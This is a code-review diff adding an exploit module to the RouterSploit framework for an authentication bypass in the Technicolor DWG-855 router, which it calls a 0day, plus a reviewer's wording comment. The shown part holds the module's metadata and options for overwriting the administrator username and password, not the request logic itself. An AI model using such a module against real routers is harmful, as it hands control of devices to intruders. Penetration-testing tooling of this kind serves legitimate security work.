routersploit/modules/exploits/technicolor/dwg855_authbypass.py

```diff
@@ -0,0 +1,82 @@
+import binascii
+
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    print_status,
+    sanitize_url,
+    http_request,
+    mute,
+    validators
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for Technicolor DWG-855 Authentication Bypass vulnerability.
+    If the target is vulnerable, it allows us to overwrite arbitrary configuration parameters.
+    """
+    __info__ = {
+        'name': 'Technicolor DWG-855 Authentication Bypass vulnerability.',
+        'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.',
+        'authors': [
+            'JPaulMora <https://JPaulMora.GitHub.io>',
+            # vulnerability discovery,routersploit module
+        ],
+        'references': [
+            'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
+        ],
+        'devices': [
+            'Technicolor DWG-855',
+        ]
+    }
+
+    target = exploits.Option('192.168.0.1', 'Target address e.g. http://192.168.0.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port')
+    nuser = exploits.Option('ruser', 'Overwrite old user with.. ')
+    npass = exploits.Option('rpass', 'Overwrite old password with.. ')
```

Comment:
I think we should come up with more suitable description. Something like "New password (overwrite *existing* password)"